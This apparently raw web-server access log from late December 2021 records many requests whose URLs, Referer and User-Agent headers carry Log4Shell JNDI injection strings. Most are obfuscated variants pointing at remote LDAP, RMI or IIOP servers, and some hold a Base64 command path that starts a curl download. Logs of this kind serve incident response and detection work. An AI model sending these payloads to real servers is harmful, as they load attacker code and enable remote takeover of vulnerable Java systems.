    URL: GET /?q=%24%7Bjndi%3Armi%3A%2F%2F51.79.74.227%3A1389%2FBinary%7D
    Referer: ${jndi:rmi://51.79.74.227:1389/Binary}
    User Agent: ${jndi:rmi://51.79.74.227:1389/Binary}

2021-12-23 134.122.66.193
    URL: GET /
    Referer: ${jndi:rmi://51.79.74.227:1389/Binary}
    User Agent: ${jndi:rmi://51.79.74.227:1389/Binary}

2021-12-23 161.35.96.229
    URL: GET /?q=%24%7B%24%7Blower%3Ajndi%7D%3A%24%7Blower%3Armi%7D%3A%2F%2F144.202.34.169%3A1389%2F%23
    Referer: ${${lower:jndi}:${lower:rmi}://144.202.34.169:1389/#Binary}
    User Agent: ${${lower:jndi}:${lower:rmi}://144.202.34.169:1389/#Binary}

2021-12-23 161.35.96.229
    URL: GET /?q=%24%7B%24%7Blower%3Ajndi%7D%3A%24%7Blower%3Armi%7D%3A%2F%2F144.202.34.169%3A1389%2F%23
    Referer: ${${lower:jndi}:${lower:rmi}://144.202.34.169:1389/#Binary}
    User Agent: ${${lower:jndi}:${lower:rmi}://144.202.34.169:1389/#Binary}

2021-12-23 161.35.96.229
    URL: GET /
    Referer: ${${lower:jndi}:${lower:rmi}://144.202.34.169:1389/#Binary}
    User Agent: ${${lower:jndi}:${lower:rmi}://144.202.34.169:1389/#Binary}

2021-12-23 161.35.96.229
    URL: GET /?q=%24%7B%24%7Blower%3Ajndi%7D%3A%24%7Blower%3Armi%7D%3A%2F%2F144.202.34.169%3A1389%2F%23
    Referer: ${${lower:jndi}:${lower:rmi}://144.202.34.169:1389/#Binary}
    User Agent: ${${lower:jndi}:${lower:rmi}://144.202.34.169:1389/#Binary}

2021-12-23 161.35.96.229
    URL: GET /
    Referer: ${${lower:jndi}:${lower:rmi}://144.202.34.169:1389/#Binary}
    User Agent: ${${lower:jndi}:${lower:rmi}://144.202.34.169:1389/#Binary}

2021-12-23 161.35.96.229
    URL: GET /?q=%24%7B%24%7Blower%3Ajndi%7D%3A%24%7Blower%3Armi%7D%3A%2F%2F144.202.34.169%3A1389%2F%23
    Referer: ${${lower:jndi}:${lower:rmi}://144.202.34.169:1389/#Binary}
    User Agent: ${${lower:jndi}:${lower:rmi}://144.202.34.169:1389/#Binary}

2021-12-23 161.35.96.229
    URL: GET /
    Referer: ${${lower:jndi}:${lower:rmi}://144.202.34.169:1389/#Binary}
    User Agent: ${${lower:jndi}:${lower:rmi}://144.202.34.169:1389/#Binary}

2021-12-23 161.35.96.229
    URL: GET /
    Referer: ${${lower:jndi}:${lower:rmi}://144.202.34.169:1389/#Binary}
    User Agent: ${${lower:jndi}:${lower:rmi}://144.202.34.169:1389/#Binary}

2021-12-23 206.81.7.210
    URL: GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F51.79.74.227%3A1389%2F%23Binary%7D
    Referer: ${jndi:ldap://51.79.74.227:1389/#Binary}
    User Agent: ${jndi:ldap://51.79.74.227:1389/#Binary}

2021-12-23 206.81.7.210
    URL: GET /
    Referer: ${jndi:ldap://51.79.74.227:1389/#Binary}
    User Agent: ${jndi:ldap://51.79.74.227:1389/#Binary}

2021-12-23 206.81.7.210
    URL: GET /?q=%24%7B%24%7Blower%3Aj%7D%24%7Blower%3An%7D%24%7Blower%3Ad%7Di%3A%24%7Blower%3Armi%7D%3
    Referer: ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://144.202.34.169:1389/#Binary}
    User Agent: ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://144.202.34.169:1389/#Binary}

2021-12-23 206.81.7.210
    URL: GET /
    Referer: ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://144.202.34.169:1389/#Binary}
    User Agent: ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://144.202.34.169:1389/#Binary}

2021-12-23 206.81.7.210
    URL: GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F51.79.74.227%3A1389%2F%23Binary%7D
    Referer: ${jndi:ldap://51.79.74.227:1389/#Binary}
    User Agent: ${jndi:ldap://51.79.74.227:1389/#Binary}

2021-12-23 206.81.7.210
    URL: GET /
    Referer: ${jndi:ldap://51.79.74.227:1389/#Binary}
    User Agent: ${jndi:ldap://51.79.74.227:1389/#Binary}

2021-12-23 206.81.7.210
    URL: GET /?q=%24%7B%24%7Blower%3Aj%7D%24%7Blower%3An%7D%24%7Blower%3Ad%7Di%3A%24%7Blower%3Armi%7D%3
    Referer: ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://144.202.34.169:1389/#Binary}
    User Agent: ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://144.202.34.169:1389/#Binary}

2021-12-23 206.81.7.210
    URL: GET /
    Referer: ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://144.202.34.169:1389/#Binary}
    User Agent: ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://144.202.34.169:1389/#Binary}

2021-12-23 195.54.160.149
    URL: GET /
    Referer: http://a.b.c.d:80/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-23 195.54.160.149
    URL: GET /
    Referer: http://140.82.47.4:80/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-23 93.104.209.56
    URL: GET /?q=%24%7B%24%7B%3A%3A-j%7Dndi%3Armi%3A%2F%2F144.202.34.169%3A1389%2FBinary%7D
    Referer: ${${::-j}ndi:rmi://144.202.34.169:1389/Binary}
    User Agent: ${${::-j}ndi:rmi://144.202.34.169:1389/Binary}

2021-12-23 93.104.209.56
    URL: GET /
    Referer: ${${::-j}ndi:rmi://144.202.34.169:1389/Binary}
    User Agent: ${${::-j}ndi:rmi://144.202.34.169:1389/Binary}

2021-12-23 93.104.209.56
    URL: GET /?q=%24%7B%24%7Blower%3Aj%7D%24%7Bupper%3An%7D%24%7Blower%3Ad%7D%24%7Bupper%3Ai%7D%3A%24%7
    Referer: ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://51.79.74.227:1389/#Binary}
    User Agent: ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://51.79.74.227:1389/#Binary}

2021-12-23 93.104.209.56
    URL: GET /
    Referer: ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://51.79.74.227:1389/#Binary}
    User Agent: ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://51.79.74.227:1389/#Binary}

2021-12-23 175.107.196.186
    URL: GET /?q=%24%7B%24%7B%3A%3A-j%7Dndi%3Armi%3A%2F%2F144.202.34.169%3A1389%2F%23Binary%7D
    Referer: ${${::-j}ndi:rmi://144.202.34.169:1389/#Binary}
    User Agent: ${${::-j}ndi:rmi://144.202.34.169:1389/#Binary}

2021-12-23 175.107.196.186
    URL: GET /
    Referer: ${${::-j}ndi:rmi://144.202.34.169:1389/#Binary}
    User Agent: ${${::-j}ndi:rmi://144.202.34.169:1389/#Binary}

2021-12-23 175.107.196.186
    URL: GET /?q=%24%7B%24%7Blower%3A%24%7Blower%3Ajndi%7D%7D%3A%24%7Blower%3Armi%7D%3A%2F%2F144.202.34
    Referer: ${${lower:${lower:jndi}}:${lower:rmi}://144.202.34.169:1389/Binary}
    User Agent: ${${lower:${lower:jndi}}:${lower:rmi}://144.202.34.169:1389/Binary}

2021-12-23 175.107.196.186
    URL: GET /
    Referer: ${${lower:${lower:jndi}}:${lower:rmi}://144.202.34.169:1389/Binary}
    User Agent: ${${lower:${lower:jndi}}:${lower:rmi}://144.202.34.169:1389/Binary}

2021-12-23 167.172.177.71
    URL: GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F51.79.74.227%3A1389%2FBinary%7D
    Referer: ${jndi:ldap://51.79.74.227:1389/Binary}
    User Agent: ${jndi:ldap://51.79.74.227:1389/Binary}

2021-12-23 167.172.177.71
    URL: GET /
    Referer: ${jndi:ldap://51.79.74.227:1389/Binary}
    User Agent: ${jndi:ldap://51.79.74.227:1389/Binary}

2021-12-23 167.172.177.71
    URL: GET /?q=%24%7B%24%7B%3A%3A-j%7D%24%7B%3A%3A-n%7D%24%7B%3A%3A-d%7D%24%7B%3A%3A-i%7D%3A%24%7B%3A
    Referer: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://144.202.34.169:1389/#Binary}
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://144.202.34.169:1389/#Binary}

2021-12-23 167.172.177.71
    URL: GET /
    Referer: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://144.202.34.169:1389/#Binary}
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://144.202.34.169:1389/#Binary}

2021-12-23 49.234.43.244
    URL: GET /
    Referer: http://140.82.47.4/?s=${jndi:ldap://142.93.172.227:1389/Exploit}
    User Agent: Mozilla/5.0

2021-12-23 195.54.160.149
    URL: GET /
    Referer: https://x.y.168.168:443/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1L
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-23 195.54.160.149
    URL: GET /
    Referer: https://x.y.169.9:443/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-22 144.91.78.55
    URL: GET /?q=%24%7B%24%7Blower%3Ajndi%7D%3A%24%7Blower%3Armi%7D%3A%2F%2F51.79.74.227%3A1389%2FBinar
    Referer: ${${lower:jndi}:${lower:rmi}://51.79.74.227:1389/Binary}
    User Agent: ${${lower:jndi}:${lower:rmi}://51.79.74.227:1389/Binary}

2021-12-22 144.91.78.55
    URL: GET /?q=%24%7B%24%7Blower%3Ajndi%7D%3A%24%7Blower%3Armi%7D%3A%2F%2F51.79.74.227%3A1389%2FBinar
    Referer: ${${lower:jndi}:${lower:rmi}://51.79.74.227:1389/Binary}
    User Agent: ${${lower:jndi}:${lower:rmi}://51.79.74.227:1389/Binary}

2021-12-22 144.91.78.55
    URL: GET /
    Referer: ${${lower:jndi}:${lower:rmi}://51.79.74.227:1389/Binary}
    User Agent: ${${lower:jndi}:${lower:rmi}://51.79.74.227:1389/Binary}

2021-12-22 144.91.78.55
    URL: GET /
    Referer: ${${lower:jndi}:${lower:rmi}://51.79.74.227:1389/Binary}
    User Agent: ${${lower:jndi}:${lower:rmi}://51.79.74.227:1389/Binary}

2021-12-22 144.91.78.55
    URL: GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F51.79.74.227%3A1389%2FBinary%7D
    Referer: ${jndi:ldap://51.79.74.227:1389/Binary}
    User Agent: ${jndi:ldap://51.79.74.227:1389/Binary}

2021-12-22 144.91.78.55
    URL: GET /
    Referer: ${jndi:ldap://51.79.74.227:1389/Binary}
    User Agent: ${jndi:ldap://51.79.74.227:1389/Binary}

2021-12-22 144.91.78.55
    URL: GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F51.79.74.227%3A1389%2FBinary%7D
    Referer: ${jndi:ldap://51.79.74.227:1389/Binary}
    User Agent: ${jndi:ldap://51.79.74.227:1389/Binary}

2021-12-22 144.91.78.55
    URL: GET /
    Referer: ${jndi:ldap://51.79.74.227:1389/Binary}
    User Agent: ${jndi:ldap://51.79.74.227:1389/Binary}

2021-12-22 139.59.60.88
    URL: GET /solr?q=%24%7B%24%7Blower%3Aj%7D%24%7Blower%3An%7D%24%7Blower%3Ad%7Di%3A%24%7Blower%3Armi%
    Referer: ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://51.79.74.227:1389/Binary}
    User Agent: ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://51.79.74.227:1389/Binary}

2021-12-22 139.59.60.88
    URL: GET /solr
    Referer: ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://51.79.74.227:1389/Binary}
    User Agent: ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://51.79.74.227:1389/Binary}

2021-12-22 139.59.60.88
    URL: GET /solr?q=%24%7B%24%7B%3A%3A-j%7Dndi%3Armi%3A%2F%2F144.202.34.169%3A1389%2F%23Binary%7D
    Referer: ${${::-j}ndi:rmi://144.202.34.169:1389/#Binary}
    User Agent: ${${::-j}ndi:rmi://144.202.34.169:1389/#Binary}

2021-12-22 139.59.60.88
    URL: GET /solr
    Referer: ${${::-j}ndi:rmi://144.202.34.169:1389/#Binary}
    User Agent: ${${::-j}ndi:rmi://144.202.34.169:1389/#Binary}

2021-12-22 144.91.65.66
    URL: GET /?q=%24%7B%24%7B%3A%3A-j%7Dndi%3Armi%3A%2F%2F167.99.115.242%3A1389%2FBinary%7D
    Referer: ${${::-j}ndi:rmi://167.99.115.242:1389/Binary}
    User Agent: ${${::-j}ndi:rmi://167.99.115.242:1389/Binary}

2021-12-22 144.91.65.66
    URL: GET /
    Referer: ${${::-j}ndi:rmi://167.99.115.242:1389/Binary}
    User Agent: ${${::-j}ndi:rmi://167.99.115.242:1389/Binary}

2021-12-22 144.91.65.66
    URL: GET /?q=%24%7B%24%7B%3A%3A-j%7D%24%7B%3A%3A-n%7D%24%7B%3A%3A-d%7D%24%7B%3A%3A-i%7D%3A%24%7B%3A
    Referer: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://144.202.34.169:1389/Binary}
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://144.202.34.169:1389/Binary}

2021-12-22 144.91.65.66
    URL: GET /?q=%24%7B%24%7B%3A%3A-j%7Dndi%3Armi%3A%2F%2F167.99.115.242%3A1389%2FBinary%7D
    Referer: ${${::-j}ndi:rmi://167.99.115.242:1389/Binary}
    User Agent: ${${::-j}ndi:rmi://167.99.115.242:1389/Binary}

2021-12-22 144.91.65.66
    URL: GET /
    Referer: ${${::-j}ndi:rmi://167.99.115.242:1389/Binary}
    User Agent: ${${::-j}ndi:rmi://167.99.115.242:1389/Binary}

2021-12-22 144.91.65.66
    URL: GET /?q=%24%7B%24%7B%3A%3A-j%7D%24%7B%3A%3A-n%7D%24%7B%3A%3A-d%7D%24%7B%3A%3A-i%7D%3A%24%7B%3A
    Referer: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://144.202.34.169:1389/Binary}
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://144.202.34.169:1389/Binary}

2021-12-22 144.91.65.66
    URL: GET /
    Referer: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://144.202.34.169:1389/Binary}
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://144.202.34.169:1389/Binary}

2021-12-22 144.91.65.66
    URL: GET /
    Referer: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://144.202.34.169:1389/Binary}
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://144.202.34.169:1389/Binary}

2021-12-22 139.186.157.183
    URL: GET /?q=%24%7B%24%7Blower%3Ajndi%7D%3A%24%7Blower%3Armi%7D%3A%2F%2F167.99.115.242%3A1389%2FBin
    Referer: ${${lower:jndi}:${lower:rmi}://167.99.115.242:1389/Binary}
    User Agent: ${${lower:jndi}:${lower:rmi}://167.99.115.242:1389/Binary}

2021-12-22 139.186.157.183
    URL: GET /
    Referer: ${${lower:jndi}:${lower:rmi}://167.99.115.242:1389/Binary}
    User Agent: ${${lower:jndi}:${lower:rmi}://167.99.115.242:1389/Binary}

2021-12-22 139.186.157.183
    URL: GET /?q=%24%7Bjndi%3Armi%3A%2F%2F51.79.74.227%3A1389%2FBinary%7D
    Referer: ${jndi:rmi://51.79.74.227:1389/Binary}
    User Agent: ${jndi:rmi://51.79.74.227:1389/Binary}

2021-12-22 139.186.157.183
    URL: GET /
    Referer: ${jndi:rmi://51.79.74.227:1389/Binary}
    User Agent: ${jndi:rmi://51.79.74.227:1389/Binary}

2021-12-22 159.65.253.201
    URL: GET /?q=%24%7Bjndi%3Armi%3A%2F%2F51.79.74.227%3A1389%2FBinary%7D
    Referer: ${jndi:rmi://51.79.74.227:1389/Binary}
    User Agent: ${jndi:rmi://51.79.74.227:1389/Binary}

2021-12-22 159.65.253.201
    URL: GET /
    Referer: ${jndi:rmi://51.79.74.227:1389/Binary}
    User Agent: ${jndi:rmi://51.79.74.227:1389/Binary}

2021-12-22 159.65.253.201
    URL: GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F144.202.34.169%3A1389%2FBinary%7D
    Referer: ${jndi:ldap://144.202.34.169:1389/Binary}
    User Agent: ${jndi:ldap://144.202.34.169:1389/Binary}

2021-12-22 159.65.253.201
    URL: GET /
    Referer: ${jndi:ldap://144.202.34.169:1389/Binary}
    User Agent: ${jndi:ldap://144.202.34.169:1389/Binary}

2021-12-22 159.65.253.201
    URL: GET /?q=%24%7Bjndi%3Armi%3A%2F%2F51.79.74.227%3A1389%2FBinary%7D
    Referer: ${jndi:rmi://51.79.74.227:1389/Binary}
    User Agent: ${jndi:rmi://51.79.74.227:1389/Binary}

2021-12-22 82.165.106.79
    URL: GET /?q=%24%7B%24%7Blower%3Ajndi%7D%3A%24%7Blower%3Armi%7D%3A%2F%2F144.202.34.169%3A1389%2F%23
    Referer: ${${lower:jndi}:${lower:rmi}://144.202.34.169:1389/#Binary}
    User Agent: ${${lower:jndi}:${lower:rmi}://144.202.34.169:1389/#Binary}

2021-12-22 159.65.253.201
    URL: GET /
    Referer: ${jndi:rmi://51.79.74.227:1389/Binary}
    User Agent: ${jndi:rmi://51.79.74.227:1389/Binary}

2021-12-22 159.65.253.201
    URL: GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F144.202.34.169%3A1389%2FBinary%7D
    Referer: ${jndi:ldap://144.202.34.169:1389/Binary}
    User Agent: ${jndi:ldap://144.202.34.169:1389/Binary}

2021-12-22 159.65.253.201
    URL: GET /
    Referer: ${jndi:ldap://144.202.34.169:1389/Binary}
    User Agent: ${jndi:ldap://144.202.34.169:1389/Binary}

2021-12-22 82.165.106.79
    URL: GET /?q=%24%7B%24%7Blower%3Ajndi%7D%3A%24%7Blower%3Armi%7D%3A%2F%2F144.202.34.169%3A1389%2F%23
    Referer: ${${lower:jndi}:${lower:rmi}://144.202.34.169:1389/#Binary}
    User Agent: ${${lower:jndi}:${lower:rmi}://144.202.34.169:1389/#Binary}

2021-12-22 82.165.106.79
    URL: GET /
    Referer: ${${lower:jndi}:${lower:rmi}://144.202.34.169:1389/#Binary}
    User Agent: ${${lower:jndi}:${lower:rmi}://144.202.34.169:1389/#Binary}

2021-12-22 82.165.106.79
    URL: GET /?q=%24%7B%24%7B%3A%3A-j%7D%24%7B%3A%3A-n%7D%24%7B%3A%3A-d%7D%24%7B%3A%3A-i%7D%3A%24%7B%3A
    Referer: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://144.202.34.169:1389/Binary}
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://144.202.34.169:1389/Binary}

2021-12-22 82.165.106.79
    URL: GET /
    Referer: ${${lower:jndi}:${lower:rmi}://144.202.34.169:1389/#Binary}
    User Agent: ${${lower:jndi}:${lower:rmi}://144.202.34.169:1389/#Binary}

2021-12-22 82.165.106.79
    URL: GET /?q=%24%7B%24%7B%3A%3A-j%7D%24%7B%3A%3A-n%7D%24%7B%3A%3A-d%7D%24%7B%3A%3A-i%7D%3A%24%7B%3A
    Referer: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://144.202.34.169:1389/Binary}
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://144.202.34.169:1389/Binary}

2021-12-22 82.165.106.79
    URL: GET /
    Referer: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://144.202.34.169:1389/Binary}
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://144.202.34.169:1389/Binary}

2021-12-22 82.165.106.79
    URL: GET /
    Referer: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://144.202.34.169:1389/Binary}
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://144.202.34.169:1389/Binary}

2021-12-21 64.227.100.222
    URL: GET /?q=%24%7B%24%7Blower%3Ajndi%7D%3A%24%7Blower%3Armi%7D%3A%2F%2F167.99.115.242%3A1389%2FBin
    Referer: ${${lower:jndi}:${lower:rmi}://167.99.115.242:1389/Binary}
    User Agent: ${${lower:jndi}:${lower:rmi}://167.99.115.242:1389/Binary}

2021-12-21 64.227.100.222
    URL: GET /
    Referer: ${${lower:jndi}:${lower:rmi}://167.99.115.242:1389/Binary}
    User Agent: ${${lower:jndi}:${lower:rmi}://167.99.115.242:1389/Binary}

2021-12-21 64.227.100.222
    URL: GET /?q=%24%7B%24%7Blower%3Ajndi%7D%3A%24%7Blower%3Armi%7D%3A%2F%2F167.99.115.242%3A1389%2FBin
    Referer: ${${lower:jndi}:${lower:rmi}://167.99.115.242:1389/Binary}
    User Agent: ${${lower:jndi}:${lower:rmi}://167.99.115.242:1389/Binary}

2021-12-21 64.227.100.222
    URL: GET /
    Referer: ${${lower:jndi}:${lower:rmi}://167.99.115.242:1389/Binary}
    User Agent: ${${lower:jndi}:${lower:rmi}://167.99.115.242:1389/Binary}

2021-12-21 159.203.86.161
    URL: GET /?q=%24%7B%24%7B%3A%3A-j%7D%24%7B%3A%3A-n%7D%24%7B%3A%3A-d%7D%24%7B%3A%3A-i%7D%3A%24%7B%3A
    Referer: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://167.99.115.242:1389/Binary}
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://167.99.115.242:1389/Binary}

2021-12-21 159.203.86.161
    URL: GET /
    Referer: ${${::-j}${::-n}${::-d}$::-i}:${::-r}${::-m}${::-i}://167.99.115.242:1389/Binary}
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://167.99.115.242:1389/Binary}

2021-12-21 159.203.86.161
    URL: GET /?q=%24%7B%24%7B%3A%3A-j%7D%24%7B%3A%3A-n%7D%24%7B%3A%3A-d%7D%24%7B%3A%3A-i%7D%3A%24%7B%3A
    Referer: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://167.99.115.242:1389/Binary}
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://167.99.115.242:1389/Binary}

2021-12-21 159.203.86.161
    URL: GET /
    Referer: ${${::-j}${::-n}${::-d}$::-i}:${::-r}${::-m}${::-i}://167.99.115.242:1389/Binary}
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://167.99.115.242:1389/Binary}

2021-12-21 159.203.86.161
    URL: GET /?q=%24%7B%24%7B%3A%3A-j%7D%24%7B%3A%3A-n%7D%24%7B%3A%3A-d%7D%24%7B%3A%3A-i%7D%3A%24%7B%3A
    Referer: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://167.99.115.242:1389/Binary}
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://167.99.115.242:1389/Binary}

2021-12-21 159.203.86.161
    URL: GET /
    Referer: ${${::-j}${::-n}${::-d}$::-i}:${::-r}${::-m}${::-i}://167.99.115.242:1389/Binary}
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://167.99.115.242:1389/Binary}

2021-12-21 159.203.86.161
    URL: GET /?q=%24%7B%24%7B%3A%3A-j%7D%24%7B%3A%3A-n%7D%24%7B%3A%3A-d%7D%24%7B%3A%3A-i%7D%3A%24%7B%3A
    Referer: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://167.99.115.242:1389/Binary}
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://167.99.115.242:1389/Binary}

2021-12-21 159.203.86.161
    URL: GET /
    Referer: ${${::-j}${::-n}${::-d}$::-i}:${::-r}${::-m}${::-i}://167.99.115.242:1389/Binary}
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://167.99.115.242:1389/Binary}

2021-12-21 198.58.104.203
    URL: GET /?q=%24%7B%24%7B%3A%3A-j%7Dndi%3Armi%3A%2F%2F188.166.57.35%3A1389%2FBinary%7D
    Referer: ${${::-j}ndi:rmi://188.166.57.35:1389/Binary}
    User Agent: ${${::-j}ndi:rmi://188.166.57.35:1389/Binary}

2021-12-21 198.58.104.203
    URL: GET /
    Referer: ${${::-j}ndi:rmi://188.166.57.35:1389/Binary}
    User Agent: ${${::-j}ndi:rmi://188.166.57.35:1389/Binary}

2021-12-21 198.58.104.203
    URL: GET /?q=%24%7B%24%7B%3A%3A-j%7Dndi%3Armi%3A%2F%2F188.166.57.35%3A1389%2FBinary%7D
    Referer: ${${::-j}ndi:rmi://188.166.57.35:1389/Binary}
    User Agent: ${${::-j}ndi:rmi://188.166.57.35:1389/Binary}

2021-12-21 198.58.104.203
    URL: GET /
    Referer: ${${::-j}ndi:rmi://188.166.57.35:1389/Binary}
    User Agent: ${${::-j}ndi:rmi://188.166.57.35:1389/Binary}

2021-12-21 62.171.179.103
    URL: GET /?q=%24%7B%24%7B%3A%3A-j%7D%24%7B%3A%3A-n%7D%24%7B%3A%3A-d%7D%24%7B%3A%3A-i%7D%3A%24%7B%3A
    Referer: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://167.99.115.242:1389/Binary}
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://167.99.115.242:1389/Binary}

2021-12-21 62.171.179.103
    URL: GET /?q=%24%7B%24%7B%3A%3A-j%7D%24%7B%3A%3A-n%7D%24%7B%3A%3A-d%7D%24%7B%3A%3A-i%7D%3A%24%7B%3A
    Referer: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://167.99.115.242:1389/Binary}
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://167.99.115.242:1389/Binary}

2021-12-21 62.171.179.103
    URL: GET /
    Referer: ${${::-j}${::-n}${::-d}$::-i}:${::-r}${::-m}${::-i}://167.99.115.242:1389/Binary}
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://167.99.115.242:1389/Binary}

2021-12-21 62.171.179.103
    URL: GET /
    Referer: ${${::-j}${::-n}${::-d}$::-i}:${::-r}${::-m}${::-i}://167.99.115.242:1389/Binary}
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://167.99.115.242:1389/Binary}

2021-12-21 62.171.179.103
    URL: GET /?q=%24%7B%24%7Blower%3Aj%7D%24%7Blower%3An%7D%24%7Blower%3Ad%7Di%3A%24%7Blower%3Armi%7D%3
    Referer: ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://167.99.115.242:1389/Binary}
    User Agent: ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://167.99.115.242:1389/Binary}

2021-12-21 62.171.179.103
    URL: GET /?q=%24%7B%24%7Blower%3Aj%7D%24%7Blower%3An%7D%24%7Blower%3Ad%7Di%3A%24%7Blower%3Armi%7D%3
    Referer: ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://167.99.115.242:1389/Binary}
    User Agent: ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://167.99.115.242:1389/Binary}

2021-12-21 62.171.179.103
    URL: GET /
    Referer: ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://167.99.115.242:1389/Binary}
    User Agent: ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://167.99.115.242:1389/Binary}

2021-12-21 62.171.179.103
    URL: GET /
    Referer: ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://167.99.115.242:1389/Binary}
    User Agent: ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://167.99.115.242:1389/Binary}

2021-12-21 128.90.59.60
    URL: GET //$%7Bjndi:iiop://128.90.59.60:6776/1640052453%7D
    Referer: ${jndi:iiop://128.90.59.60:6776/1640052453}
    User Agent: ${jndi:iiop://128.90.59.60:6776/1640052453}

2021-12-21 161.97.170.219
    URL: GET /?q=%24%7B%24%7Blower%3Aj%7D%24%7Blower%3An%7D%24%7Blower%3Ad%7Di%3A%24%7Blower%3Armi%7D%3
    Referer: ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://167.99.115.242:1389/Binary}
    User Agent: ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://167.99.115.242:1389/Binary}

2021-12-21 161.97.170.219
    URL: GET /
    Referer: ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://167.99.115.242:1389/Binary}
    User Agent: ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://167.99.115.242:1389/Binary}

2021-12-21 161.97.170.219
